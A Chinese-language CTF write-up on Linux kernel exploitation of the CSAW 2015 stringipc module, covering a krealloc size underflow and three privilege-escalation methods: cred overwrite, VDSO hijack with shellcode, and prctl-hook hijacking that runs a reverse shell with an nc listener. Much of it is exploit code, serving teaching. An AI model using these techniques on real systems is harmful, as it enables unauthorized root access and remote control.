Linux内核漏洞利用入门：从内存任意读写到权限提升<\/h1>

1. 环境搭建与题目分析<\/h2>

1.1 环境准备<\/h3>
内核版本：linux-4.4.110<\/li>
busybox版本：1.21.1<\/li>
题目源码：CSAW-2015-CTF的stringipc题目<\/li> <\/ul>
1.2 题目分析<\/h3>
题目维护了一块由kzalloc(sizeof(*channel), GFP_KERNEL)<\/code>创建的内存块，提供以下功能：<\/p>

内存块读、写<\/li>
内存块扩展或缩小<\/li>
<\/ul>
1.3 漏洞分析<\/h3>
漏洞存在于realloc_ipc_channel<\/code>函数中：<\/p>
static<\/span> int<\/span> realloc_ipc_channel<\/span>(struct<\/span> ipc_state *<\/span>state, int<\/span> id, size_t size, int<\/span> grow) {
<\/span><\/span>    struct<\/span> ipc_channel *<\/span>channel;
<\/span><\/span>    size_t new_size;
<\/span><\/span>    char<\/span> *<\/span>new_data;
<\/span><\/span>    
<\/span><\/span>    channel =<\/span> get_channel_by_id(state, id);
<\/span><\/span>    if<\/span> (IS_ERR(channel)) return<\/span> PTR_ERR(channel);
<\/span><\/span>    
<\/span><\/span>    if<\/span> (grow)
<\/span><\/span>        new_size =<\/span> channel-><\/span>buf_size +<\/span> size;
<\/span><\/span>    else<\/span>
<\/span><\/span>        new_size =<\/span> channel-><\/span>buf_size -<\/span> size;
<\/span><\/span>    
<\/span><\/span>    new_data =<\/span> krealloc(channel-><\/span>data, new_size +<\/span> 1<\/span>, GFP_KERNEL);
<\/span><\/span>    if<\/span> (new_data ==<\/span> NULL) return<\/span> -<\/span>EINVAL;
<\/span><\/span>    
<\/span><\/span>    channel-><\/span>data =<\/span> new_data;
<\/span><\/span>    channel-><\/span>buf_size =<\/span> new_size;
<\/span><\/span>    ipc_channel_put(state, channel);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键漏洞点：<\/p>

当new_size = 0<\/code>时，krealloc<\/code>会返回ZERO_SIZE_PTR<\/code>（定义为(void *)16<\/code>）<\/li>
通过构造new_size = 0 - 1<\/code>（即0xffffffffffffffff<\/code>），可以绕过检查<\/li>
最终获得内存任意读写能力<\/li>
<\/ol>
2. 利用方法一：修改cred结构体提权<\/h2>
2.1 关键数据结构<\/h3>
2.1.1 thread_info结构<\/h4>
struct<\/span> thread_info {
<\/span><\/span>    struct<\/span> task_struct *<\/span>task;  \/* main task structure *\/<\/span>
<\/span><\/span>    __u32 flags;               \/* low level flags *\/<\/span>
<\/span><\/span>    __u32 status;              \/* thread synchronous flags *\/<\/span>
<\/span><\/span>    __u32 cpu;                 \/* current CPU *\/<\/span>
<\/span><\/span>    mm_segment_t addr_limit;
<\/span><\/span>    unsigned<\/span> int<\/span> sig_on_uaccess_error:1<\/span>;
<\/span><\/span>    unsigned<\/span> int<\/span> uaccess_err:1<\/span>; \/* uaccess failed *\/<\/span>
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>2.1.2 task_struct结构（简化）<\/h4>
struct<\/span> task_struct {
<\/span><\/span>    volatile<\/span> long<\/span> state;
<\/span><\/span>    void<\/span> *<\/span>stack;
<\/span><\/span>    atomic_t usage;
<\/span><\/span>    unsigned<\/span> int<\/span> flags;
<\/span><\/span>    unsigned<\/span> int<\/span> ptrace;
<\/span><\/span>    
<\/span><\/span>    \/* process credentials *\/<\/span>
<\/span><\/span>    const<\/span> struct<\/span> cred __rcu *<\/span>ptracer_cred;
<\/span><\/span>    const<\/span> struct<\/span> cred __rcu *<\/span>real_cred;
<\/span><\/span>    const<\/span> struct<\/span> cred __rcu *<\/span>cred;
<\/span><\/span>    
<\/span><\/span>    char<\/span> comm[TASK_COMM_LEN]; \/* executable name *\/<\/span>
<\/span><\/span>    \/* ... *\/<\/span>
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>2.1.3 cred结构体<\/h4>
struct<\/span> cred {
<\/span><\/span>    atomic_t usage;
<\/span><\/span>    kuid_t uid;    \/* real UID *\/<\/span>
<\/span><\/span>    kgid_t gid;    \/* real GID *\/<\/span>
<\/span><\/span>    kuid_t suid;   \/* saved UID *\/<\/span>
<\/span><\/span>    kgid_t sgid;   \/* saved GID *\/<\/span>
<\/span><\/span>    kuid_t euid;   \/* effective UID *\/<\/span>
<\/span><\/span>    kgid_t egid;   \/* effective GID *\/<\/span>
<\/span><\/span>    kuid_t fsuid;  \/* UID for VFS ops *\/<\/span>
<\/span><\/span>    kgid_t fsgid;  \/* GID for VFS ops *\/<\/span>
<\/span><\/span>    \/* ... *\/<\/span>
<\/span><\/span>};
<\/span><\/span><\/code><\/pre>2.2 利用步骤<\/h3>

使用prctl(PR_SET_NAME, "targetname")<\/code>设置线程名<\/li>
在内核内存中搜索该字符串（范围：0xffff880000000000~0xffffc80000000000）<\/li>
找到task_struct<\/code>后，定位cred<\/code>结构体<\/li>
将cred<\/code>中的UID\/GID相关字段全部写0<\/li>
<\/ol>
2.3 EXP代码关键部分<\/h3>
\/\/ 设置目标线程名
<\/span><\/span><\/span><\/span>char<\/span> target[16<\/span>];
<\/span><\/span>strcpy(target, "try2findmep4nda"<\/span>);
<\/span><\/span>prctl(PR_SET_NAME, target);
<\/span><\/span>
<\/span><\/span>\/\/ 搜索内存
<\/span><\/span><\/span><\/span>for<\/span>(; addr <<\/span> 0xffffc80000000000<\/span>; addr +=<\/span> 0x1000<\/span>) {
<\/span><\/span>    seek_args.index =<\/span> addr -<\/span> 0x10<\/span>;
<\/span><\/span>    ioctl(fd, CSAW_SEEK_CHANNEL, &<\/span>seek_args);
<\/span><\/span>    ioctl(fd, CSAW_READ_CHANNEL, &<\/span>read_args);
<\/span><\/span>    
<\/span><\/span>    result =<\/span> memmem(buf, 0x1000<\/span>, target, 16<\/span>);
<\/span><\/span>    if<\/span>(result) {
<\/span><\/span>        cred =<\/span> *<\/span>(size_t*<\/span>)(result -<\/span> 0x8<\/span>);
<\/span><\/span>        real_cred =<\/span> *<\/span>(size_t*<\/span>)(result -<\/span> 0x10<\/span>);
<\/span><\/span>        if<\/span>((cred ||<\/span> 0xff00000000000000<\/span>) &&<\/span> (real_cred ==<\/span> cred)) {
<\/span><\/span>            target_addr =<\/span> addr +<\/span> result -<\/span> (int<\/span>)(buf);
<\/span><\/span>            printf("[+]found task_struct 0x%lx<\/span>\n<\/span>"<\/span>, target_addr);
<\/span><\/span>            printf("[+]found cred 0x%lx<\/span>\n<\/span>"<\/span>, real_cred);
<\/span><\/span>            break<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ 修改cred
<\/span><\/span><\/span><\/span>for<\/span>(int<\/span> i =<\/span> 0<\/span>; i <<\/span> 44<\/span>; i++<\/span>) {
<\/span><\/span>    seek_args.index =<\/span> cred -<\/span> 0x10<\/span> +<\/span> 4<\/span> +<\/span> i;
<\/span><\/span>    ioctl(fd, CSAW_SEEK_CHANNEL, &<\/span>seek_args);
<\/span><\/span>    root_cred[0<\/span>] =<\/span> 0<\/span>;
<\/span><\/span>    write_args.buf =<\/span> (char<\/span>*<\/span>)root_cred;
<\/span><\/span>    write_args.count =<\/span> 1<\/span>;
<\/span><\/span>    ioctl(fd, CSAW_WRITE_CHANNEL, &<\/span>write_args);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. 利用方法二：劫持VDSO<\/h2>
3.1 VDSO基础知识<\/h3>

VDSO（Virtual Dynamic Shared Object）是内核映射到用户空间的内存区域<\/li>
包含常用系统调用的快速实现（如gettimeofday<\/code>）<\/li>
内核可读写，用户空间可读可执行<\/li>
<\/ul>
3.2 利用原理<\/h3>

找到VDSO在内核中的映射地址<\/li>
修改VDSO中的函数（如gettimeofday<\/code>）为shellcode<\/li>
等待高权限进程调用被修改的函数<\/li>
<\/ol>
3.3 关键步骤<\/h3>

爆破搜索VDSO（范围：0xffffffff80000000~0xffffffffffffefff）<\/li>
识别VDSO通过ELF头特征和函数名<\/li>
覆盖目标函数（如gettimeofday<\/code>在偏移0xc80处）<\/li>
<\/ol>
3.4 Shellcode示例<\/h3>
nop<\/span>
<\/span><\/span>push<\/span> rbx<\/span>
<\/span><\/span>xor<\/span> rax<\/span>, rax<\/span>
<\/span><\/span>mov<\/span> al<\/span>, 0x66<\/span>
<\/span><\/span>syscall<\/span>        # check uid
<\/span><\/span><\/span><\/span>xor<\/span> rbx<\/span>, rbx<\/span>
<\/span><\/span>cmp<\/span> rbx<\/span>, rax<\/span>
<\/span><\/span>jne<\/span> emulate<\/span>
<\/span><\/span>xor<\/span> rax<\/span>, rax<\/span>
<\/span><\/span>mov<\/span> al<\/span>, 0x39<\/span>
<\/span><\/span>syscall<\/span>        # fork
<\/span><\/span><\/span><\/span>xor<\/span> rbx<\/span>, rbx<\/span>
<\/span><\/span>cmp<\/span> rax<\/span>, rbx<\/span>
<\/span><\/span>je<\/span> connectback<\/span>
<\/span><\/span>emulate:
<\/span><\/span>pop<\/span> rbx<\/span>
<\/span><\/span>xor<\/span> rax<\/span>, rax<\/span>
<\/span><\/span>mov<\/span> al<\/span>, 0x60<\/span>
<\/span><\/span>syscall<\/span>
<\/span><\/span>retq<\/span>
<\/span><\/span>connectback:
<\/span><\/span># 反弹shell代码...
<\/span><\/span><\/span><\/code><\/pre>4. 利用方法三：劫持prctl<\/h2>
4.1 原理分析<\/h3>

prctl<\/code>最终调用security_task_prctl<\/code><\/li>
security_task_prctl<\/code>通过hp->hook.task_prctl<\/code>调用实际处理函数<\/li>
该hook位于内核data段，可被修改<\/li>
<\/ol>
4.2 关键函数<\/h3>
int<\/span> security_task_prctl<\/span>(int<\/span> option, unsigned<\/span> long<\/span> arg2, unsigned<\/span> long<\/span> arg3,
<\/span><\/span>                       unsigned<\/span> long<\/span> arg4, unsigned<\/span> long<\/span> arg5) {
<\/span><\/span>    int<\/span> thisrc;
<\/span><\/span>    int<\/span> rc =<\/span> -<\/span>ENOSYS;
<\/span><\/span>    struct<\/span> security_hook_list *<\/span>hp;
<\/span><\/span>
<\/span><\/span>    list_for_each_entry(hp, &<\/span>security_hook_heads.task_prctl, list) {
<\/span><\/span>        thisrc =<\/span> hp-><\/span>hook.task_prctl(option, arg2, arg3, arg4, arg5);
<\/span><\/span>        if<\/span> (thisrc !=<\/span> -<\/span>ENOSYS) {
<\/span><\/span>            rc =<\/span> thisrc;
<\/span><\/span>            if<\/span> (thisrc !=<\/span> 0<\/span>)
<\/span><\/span>                break<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    return<\/span> rc;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.3 利用call_usermodehelper<\/h3>
int<\/span> call_usermodehelper<\/span>(char<\/span> *<\/span>path, char<\/span> **<\/span>argv, char<\/span> **<\/span>envp, int<\/span> wait) {
<\/span><\/span>    struct<\/span> subprocess_info *<\/span>info;
<\/span><\/span>    gfp_t gfp_mask =<\/span> (wait ==<\/span> UMH_NO_WAIT) ?<\/span> GFP_ATOMIC : GFP_KERNEL;
<\/span><\/span>    
<\/span><\/span>    info =<\/span> call_usermodehelper_setup(path, argv, envp, gfp_mask, NULL, NULL, NULL);
<\/span><\/span>    if<\/span> (info ==<\/span> NULL) return<\/span> -<\/span>ENOMEM;
<\/span><\/span>    
<\/span><\/span>    return<\/span> call_usermodehelper_exec(info, wait);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.4 利用步骤<\/h3>

找到VDSO获取内核基址<\/li>
定位prctl_hook<\/code>和poweroff_cmd<\/code>地址<\/li>
修改poweroff_cmd<\/code>为反弹shell命令<\/li>
将prctl_hook<\/code>指向poweroff_work_func<\/code><\/li>
<\/ol>
4.5 EXP关键代码<\/h3>
\/\/ 修改poweroff_cmd
<\/span><\/span><\/span><\/span>strcpy(buf, "\/reverse_shell<\/span>\0<\/span>"<\/span>);
<\/span><\/span>seek_args.index =<\/span> order_cmd -<\/span> 0x10<\/span>;
<\/span><\/span>ioctl(fd, CSAW_SEEK_CHANNEL, &<\/span>seek_args);
<\/span><\/span>write_args.buf =<\/span> buf;
<\/span><\/span>write_args.count =<\/span> strlen(buf);
<\/span><\/span>ioctl(fd, CSAW_WRITE_CHANNEL, &<\/span>write_args);
<\/span><\/span>
<\/span><\/span>\/\/ 修改prctl_hook
<\/span><\/span><\/span><\/span>*<\/span>(size_t*<\/span>)buf =<\/span> poweroff_work_func_addr;
<\/span><\/span>seek_args.index =<\/span> prctl_hook -<\/span> 0x10<\/span>;
<\/span><\/span>ioctl(fd, CSAW_SEEK_CHANNEL, &<\/span>seek_args);
<\/span><\/span>write_args.buf =<\/span> buf;
<\/span><\/span>write_args.count =<\/span> 20<\/span>+<\/span>1<\/span>;
<\/span><\/span>ioctl(fd, CSAW_WRITE_CHANNEL, &<\/span>write_args);
<\/span><\/span>
<\/span><\/span>\/\/ 触发
<\/span><\/span><\/span><\/span>if<\/span>(fork() ==<\/span> 0<\/span>) {
<\/span><\/span>    prctl(addr, 2<\/span>, addr, addr, 2<\/span>);
<\/span><\/span>    exit(-<\/span>1<\/span>);
<\/span><\/span>}
<\/span><\/span>system("nc -l -p 2333"<\/span>);
<\/span><\/span><\/code><\/pre>5. 总结与防御<\/h2>
5.1 三种利用方法对比<\/h3>

修改cred<\/strong>：直接有效，但需要定位cred结构<\/li>
劫持VDSO<\/strong>：隐蔽性强，但需要等待高权限进程触发<\/li>
劫持prctl<\/strong>：灵活可靠，但需要更多内核知识<\/li>
<\/ol>
5.2 防御措施<\/h3>

启用SMEP\/SMAP防止用户空间代码执行<\/li>
内核地址随机化（KASLR）<\/li>
对内核内存写操作进行严格检查<\/li>
关键数据结构保护（如cred结构）<\/li>
<\/ol>
5.3 学习资源<\/h3>

Bypassing SMEP Using vDSO Overwrites<\/li>
New Reliable Android Kernel Root Exploitation Techniques<\/li>
Linux内核源码分析<\/li>
<\/ol>
通过这三种方法的学习，可以深入理解Linux内核漏洞利用的基本原理和技术路线，为进一步研究内核安全打下坚实基础。<\/p>